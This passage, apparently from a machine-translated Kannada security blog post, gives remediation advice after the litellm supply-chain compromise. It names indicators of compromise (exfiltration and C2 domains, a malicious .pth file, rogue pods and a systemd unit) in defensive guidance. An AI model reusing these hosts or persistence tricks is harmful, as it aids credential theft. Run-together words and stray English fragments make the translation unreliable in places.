pip install litellm==1.82.6 --hash=sha256:...ರಾಜಿ ಮಾಡಿಕೊಂಡ ಆವೃತ್ತಿಗಳು ಇತ್ತೀಚಿನ ಆವೃತ್ತಿಯಂತೆ ಸಂಕ್ಷಿಪ್ತವಾಗಿ ಕಾಣಿಸಿಕೊಂಡಿದ್ದರೂ ಸಹ, ಅವುಗಳನ್ನು ಸ್ಥಾಪಿಸುವುದನ್ನು ತಡೆಯಬಹುದಿತ್ತು. - ಲಾಕ್ಫೈಲ್ಗಳನ್ನು ಬಳಸಿ.
pip-compile,poetry.lock, ಮತ್ತುuv.lockನಿಖರವಾದ ಆವೃತ್ತಿಗಳು ಮತ್ತು ಹ್ಯಾಶ್ಗಳನ್ನು ಸೆರೆಹಿಡಿಯಿರಿ. CI/CD ಫ್ಲೋಟಿಂಗ್ ಆವೃತ್ತಿ ನಿರ್ದಿಷ್ಟಪಡಿಸುವಿಕೆಗಳಿಂದಲ್ಲ, ಲಾಕ್ಫೈಲ್ಗಳಿಂದ ಸ್ಥಾಪಿಸಬೇಕು. - ಫಾರ್ ಮಾನಿಟರ್
.pthಕಡತಗಳನ್ನು. ನಿಯಮಿತವಾಗಿ ಲೆಕ್ಕಪರಿಶೋಧನೆ ಮಾಡಿsite-packages/ಅನಿರೀಕ್ಷಿತವಾಗಿ.pthಫೈಲ್ಗಳು — ಅವು ಪ್ರತಿ ಪೈಥಾನ್ ಸ್ಟಾರ್ಟ್ಅಪ್ನಲ್ಲಿ ಕಾರ್ಯಗತಗೊಳ್ಳುತ್ತವೆ ಮತ್ತು ಕಡಿಮೆ ಮೆಚ್ಚುಗೆ ಪಡೆದ ನಿರಂತರ ಕಾರ್ಯವಿಧಾನವಾಗಿದೆ. - ನಿರ್ಗಮನ ಜಾಲ ನಿಯಂತ್ರಣಗಳನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಿ. ಗೆ ಹೊರಹಾಕುವಿಕೆ
models.litellm.cloudಮತ್ತು C2 ಸಮೀಕ್ಷೆಯುcheckmarx.zoneಉತ್ಪಾದನಾ ಪರಿಸರದಲ್ಲಿ ಅನುಮತಿ ಪಟ್ಟಿ ಆಧಾರಿತ ನಿರ್ಗಮನ ಫಿಲ್ಟರಿಂಗ್ ಮೂಲಕ ಹಿಡಿಯಬಹುದಿತ್ತು.
ಪ್ಯಾಕೇಜ್ ನಿರ್ವಹಣೆ ಮಾಡುವವರಿಗೆ
- ಪಿನ್ CI/CD ಕ್ರಮಗಳು commit SHA, ಟ್ಯಾಗ್ ಅಲ್ಲ. ಲೈಟ್ಎಲ್ಎಲ್ಎಂಗಳು pipeline ಪಿನ್ ಮಾಡಲಾದ ಆವೃತ್ತಿಯಿಲ್ಲದೆ ಟ್ರಿವಿ ಬಳಸಲಾಗಿದೆ. ಅದು ಉಲ್ಲೇಖಿಸಿದ್ದರೆ
aquasecurity/trivy-action@<commit-sha>ಬದಲಾಗಿ@latest, ರಾಜಿ ಮಾಡಿಕೊಂಡ ಕ್ರಿಯೆಯನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸುತ್ತಿರಲಿಲ್ಲ. - ಅಲ್ಪಾವಧಿಯ, ವ್ಯಾಪ್ತಿಯ ಪ್ರಕಾಶನ ಟೋಕನ್ಗಳನ್ನು ಬಳಸಿ. PyPI ವಿಶ್ವಾಸಾರ್ಹ ಪ್ರಕಾಶಕರು (OIDC-ಆಧಾರಿತ) ಮತ್ತು ಸ್ಕೋಪ್ಡ್ API ಟೋಕನ್ಗಳನ್ನು ಬೆಂಬಲಿಸುತ್ತದೆ.
PYPI_PUBLISHಟೋಕನ್ ದೀರ್ಘಕಾಲೀನ, ಅನಿಯಂತ್ರಿತ ಪ್ರಕಟಣೆ ಪ್ರವೇಶವನ್ನು ಹೊಂದಿರಬಾರದು. - PyPI ನಲ್ಲಿ ಎರಡು ಅಂಶಗಳ ದೃಢೀಕರಣವನ್ನು ಸಕ್ರಿಯಗೊಳಿಸಿ. ಎಲ್ಲಾ ನಿರ್ವಹಣಾಕಾರರಿಗೆ 2FA ಅಗತ್ಯವಿದೆ ಮತ್ತು ಸಾಧ್ಯವಾದಲ್ಲೆಲ್ಲಾ ಹಾರ್ಡ್ವೇರ್ ಭದ್ರತಾ ಕೀಲಿಗಳನ್ನು ಬಳಸಿ.
- ಪ್ಯಾಕೇಜ್ಗಳಿಗೆ ಸಹಿ ಮಾಡಿ. ಸಿಗ್ಸ್ಟೋರ್/PEP 740 ದೃಢೀಕರಣಗಳು ಗ್ರಾಹಕರು ಪ್ಯಾಕೇಜ್ ಅನ್ನು ನಿರೀಕ್ಷಿತ ಸಮಯಕ್ಕೆ ನಿರ್ಮಿಸಲಾಗಿದೆಯೇ ಎಂದು ಪರಿಶೀಲಿಸಲು ಅನುವು ಮಾಡಿಕೊಡುತ್ತದೆ CI/CD pipeline, ಕದ್ದ ಟೋಕನ್ ಹೊಂದಿರುವ ದಾಳಿಕೋರರಿಂದ ಅಲ್ಲ.
ಪ್ಲಾಟ್ಫಾರ್ಮ್ ಆಪರೇಟರ್ಗಳಿಗಾಗಿ (PyPI, npm, GitHub)
- ಅಸಹಜ ಪ್ರಕಟಣೆಯ ಮಾದರಿಗಳನ್ನು ಪತ್ತೆ ಮಾಡಿ. ಸಾಮಾನ್ಯಕ್ಕಿಂತ ಭಿನ್ನವಾದ ಐಪಿ ಅಥವಾ ಟೋಕನ್ನಿಂದ 13 ನಿಮಿಷಗಳ ಅಂತರದಲ್ಲಿ ಪ್ರಕಟವಾದ ಎರಡು ಹೊಸ ಆವೃತ್ತಿಗಳು, ಪ್ಯಾಕೇಜ್ ಅನ್ನು ಸ್ಥಾಪಿಸುವ ಮೊದಲು ಹೋಲ್ಡ್-ಫಾರ್-ರಿವ್ಯೂ ಅಥವಾ ಸ್ವಯಂಚಾಲಿತ ಸ್ಕ್ಯಾನಿಂಗ್ ಅನ್ನು ಪ್ರಚೋದಿಸಬೇಕು.
- ವಿಶ್ವಾಸಾರ್ಹ ಪ್ರಕಾಶಕರ ಅಳವಡಿಕೆಯನ್ನು ವೇಗಗೊಳಿಸಿ. OIDC-ಆಧಾರಿತ ಪ್ರಕಾಶನವು ಪ್ಯಾಕೇಜ್ಗಳನ್ನು ನಿರ್ದಿಷ್ಟ ರೆಪೊಸಿಟರಿಗಳು ಮತ್ತು ಕೆಲಸದ ಹರಿವುಗಳಿಗೆ ಜೋಡಿಸುತ್ತದೆ, ಕದ್ದ ಟೋಕನ್ಗಳನ್ನು ಮೂಲದಿಂದ ಹೊರಗೆ ನಿಷ್ಪ್ರಯೋಜಕವಾಗಿಸುತ್ತದೆ. CI/CD ಸನ್ನಿವೇಶ.
- ಪ್ರಕಟಣೆ-ಸಮಯದ ಮಾಲ್ವೇರ್ ಸ್ಕ್ಯಾನಿಂಗ್ ಅನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಿ. proxy_server.py ನಲ್ಲಿರುವ base64-ಡಿಕೋಡ್ ಮಾಡಲಾದ ಪೇಲೋಡ್ ಅನ್ನು ಪ್ರಕಟಣೆಯ ಸಮಯದಲ್ಲಿ ಸ್ಥಿರ ವಿಶ್ಲೇಷಣೆಯಿಂದ ಪತ್ತೆಹಚ್ಚಬಹುದಾಗಿದೆ.
ಪರಿಸರ ವ್ಯವಸ್ಥೆಗಾಗಿ
- ಭದ್ರತಾ ಪರಿಕರಗಳನ್ನು ನಿರ್ಣಾಯಕ ಮೂಲಸೌಕರ್ಯವಾಗಿ ಪರಿಗಣಿಸಿ. ಟ್ರಿವಿ ಮತ್ತು ಚೆಕ್ಮಾರ್ಕ್ಸ್ KICS ಗಳನ್ನು ಲಕ್ಷಾಂತರ ಜನರು ಬಳಸುತ್ತಾರೆ pipelines. ಅವರ GitHub ಕ್ರಿಯೆಗಳನ್ನು ಅವರು ಸ್ಕ್ಯಾನ್ ಮಾಡುವ ಪ್ಯಾಕೇಜ್ಗಳಂತೆಯೇ ಅದೇ ಕಠಿಣತೆಯಿಂದ ಸಹಿ ಮಾಡಬೇಕು, ಪಿನ್ ಮಾಡಬೇಕು ಮತ್ತು ಮೇಲ್ವಿಚಾರಣೆ ಮಾಡಬೇಕು.
- ರನ್ಟೈಮ್ ಪತ್ತೆಯಲ್ಲಿ ಹೂಡಿಕೆ ಮಾಡಿ. ಪ್ರತಿಯೊಂದು ಅಸ್ಪಷ್ಟ ತಂತ್ರವನ್ನು ಸ್ಥಿರ ವಿಶ್ಲೇಷಣೆ ಮಾತ್ರ ಹಿಡಿಯಲು ಸಾಧ್ಯವಿಲ್ಲ. ಪ್ಯಾಕೇಜ್ ಸ್ಥಾಪನೆಯ ರನ್ಟೈಮ್ ಮಾನಿಟರಿಂಗ್ hooks, ಅನಿರೀಕ್ಷಿತ ನೆಟ್ವರ್ಕ್ ಸಂಪರ್ಕಗಳು ಮತ್ತು ಅನುಮಾನಾಸ್ಪದ ಫೈಲ್ ಪ್ರವೇಶ ಮಾದರಿಗಳು ಆಳವಾದ ರಕ್ಷಣೆಯನ್ನು ಒದಗಿಸುತ್ತದೆ.
- ಬೆದರಿಕೆ ಗುಪ್ತಚರ ಮಾಹಿತಿಯನ್ನು ವೇಗವಾಗಿ ಹಂಚಿಕೊಳ್ಳಿ. ಲಿಟೆಲ್ಮ್ಗೆ 5.5 ಗಂಟೆಗಳ ಮಾನ್ಯತೆ ಅವಧಿಯು ವೇಗವಾದ ಕ್ರಾಸ್-ವೆಂಡರ್ ಸಮನ್ವಯದಿಂದ ಕಡಿಮೆಯಾಗಬಹುದಿತ್ತು. Xygeni MEW, Socket, ಮತ್ತು Snyk ನಂತಹ ಸ್ವಯಂಚಾಲಿತ ಸ್ಕ್ಯಾನಿಂಗ್ ಸೇವೆಗಳು ಅಸಂಗತತೆಯನ್ನು ಪತ್ತೆಹಚ್ಚಿವೆ - ಅಡಚಣೆಯು ಮಾನವ ದೃಢೀಕರಣ ಮತ್ತು ನೋಂದಾವಣೆ ಪ್ರತಿಕ್ರಿಯೆ ಸಮಯ.
ತೀರ್ಮಾನ
ಟೀಮ್ಪಿಸಿಪಿ ಅಭಿಯಾನವು ಒಂದು ಮಹತ್ವದ ಕ್ಷಣವಾಗಿದೆ. software supply chain security. ಮೊದಲು ಭದ್ರತಾ ಸ್ಕ್ಯಾನರ್ಗಳನ್ನು ರಾಜಿ ಮಾಡಿಕೊಳ್ಳುವ ಮೂಲಕ ಮತ್ತು ಹೆಚ್ಚಿನ ಮೌಲ್ಯದ AI ಮೂಲಸೌಕರ್ಯಕ್ಕೆ ಅವುಗಳನ್ನು ಮೆಟ್ಟಿಲುಗಳಾಗಿ ಬಳಸುವ ಮೂಲಕ, ದಾಳಿಕೋರರು ಪೂರೈಕೆ ಸರಪಳಿಯು ಅದರ ದುರ್ಬಲವಾದ ಟ್ರಾನ್ಸಿಟಿವ್ ಅವಲಂಬನೆಯಷ್ಟೇ ಪ್ರಬಲವಾಗಿದೆ ಮತ್ತು ಆ ಅವಲಂಬನೆಯು ನಿಮ್ಮನ್ನು ಸುರಕ್ಷಿತವಾಗಿಡಲು ನೀವು ನಂಬುವ ಭದ್ರತಾ ಸಾಧನವಾಗಿರಬಹುದು ಎಂದು ಪ್ರದರ್ಶಿಸಿದರು.
ಲಿಟೆಲ್ಮ್ ರಾಜಿ ನಿರ್ದಿಷ್ಟವಾಗಿ AI ಮೂಲಸೌಕರ್ಯಕ್ಕೆ ಹೆಚ್ಚುತ್ತಿರುವ ಅಪಾಯವನ್ನು ಎತ್ತಿ ತೋರಿಸುತ್ತದೆ. LLM ಪ್ರಾಕ್ಸಿ ಗೇಟ್ವೇಗಳು ... standard ಮಾದರಿ enterprise AI ನಿಯೋಜನೆಯಲ್ಲಿ, ಅವರು API ಕೀಗಳು, ಕ್ಲೌಡ್ ರುಜುವಾತುಗಳು ಮತ್ತು ಸೂಕ್ಷ್ಮ ಡೇಟಾಗೆ ಪ್ರವೇಶವನ್ನು ಒಂದೇ ಘಟಕದಲ್ಲಿ ಕೇಂದ್ರೀಕರಿಸುತ್ತಾರೆ. ಆ ಘಟಕವನ್ನು ರಾಜಿ ಮಾಡಿಕೊಳ್ಳುವುದು ಸಂಪೂರ್ಣ AI ಸ್ಟ್ಯಾಕ್ಗೆ ಅಸ್ಥಿಪಂಜರ ಕೀಲಿಯಾಗಿದೆ.
5.5-ಗಂಟೆಗಳ ಅವಧಿಯಲ್ಲಿ litellm 1.82.7 ಅಥವಾ 1.82.8 ಅನ್ನು ಸ್ಥಾಪಿಸಿದ ಸಂಸ್ಥೆಗಳು ಇದನ್ನು ಸಂಪೂರ್ಣ ರುಜುವಾತು ರಾಜಿ ಎಂದು ಪರಿಗಣಿಸಬೇಕು: ಪೀಡಿತ ವ್ಯವಸ್ಥೆಗಳಲ್ಲಿನ ಎಲ್ಲಾ ರಹಸ್ಯಗಳನ್ನು ತಿರುಗಿಸಿ, Kubernetes ಕ್ಲಸ್ಟರ್ಗಳನ್ನು ಆಡಿಟ್ ಮಾಡಿ node-setup-* ಪಾಡ್ಗಳು ಒಳಗೆ kube-system, ಯಾವುದನ್ನಾದರೂ ತೆಗೆದುಹಾಕಿ sysmon.service systemd ಘಟಕಗಳು, ಮತ್ತು ಪರಿಶೀಲಿಸಿ litellm_init.pth ಪೈಥಾನ್ನಲ್ಲಿ site-packages/ ಡೈರೆಕ್ಟರಿಗಳು. ಅಧಿಕೃತ ಡಾಕರ್ ಚಿತ್ರದ ಬಳಕೆದಾರರು (ghcr.io/berriai/litellm) ಪರಿಣಾಮ ಬೀರಲಿಲ್ಲ, ಏಕೆಂದರೆ ಚಿತ್ರವು ಅದರ ಅವಲಂಬನೆಗಳನ್ನು ಪಿನ್ ಮಾಡಿತು ಮತ್ತು ಎಕ್ಸ್ಪೋಸರ್ ವಿಂಡೋ ಸಮಯದಲ್ಲಿ ಅದನ್ನು ಪುನರ್ನಿರ್ಮಿಸಲಾಗಿಲ್ಲ.
ಲೇಖಕರ ಬಗ್ಗೆ
ಸಹ-ಸಂಸ್ಥಾಪಕ ಮತ್ತು CTO
ಲೂಯಿಸ್ ರೊಡ್ರಿಗಸ್ ಕ್ಸಿಜೆನಿ ಸೆಕ್ಯುರಿಟಿಯಲ್ಲಿ ಸಹ-ಸಂಸ್ಥಾಪಕ ಮತ್ತು ಸಿಟಿಒ ಆಗಿದ್ದಾರೆ. 20+ ವರ್ಷಗಳ ಅಪ್ಲಿಕೇಶನ್ ಭದ್ರತೆಯಲ್ಲಿ, ಅವರು ಆಪ್ಸೆಕ್ ರಕ್ಷಣೆ ಮತ್ತು ಸುಧಾರಿತ ಕೋಡ್-ವಿಶ್ಲೇಷಣಾ ಸಾಮರ್ಥ್ಯಗಳ ಮೇಲೆ ಕೇಂದ್ರೀಕರಿಸುತ್ತಾರೆ, ಇದು ತಂಡಗಳಿಗೆ ನೈಜ ವಿತರಣಾ ಅಪಾಯವನ್ನು ಕಡಿಮೆ ಮಾಡಲು ಸಹಾಯ ಮಾಡುತ್ತದೆ.




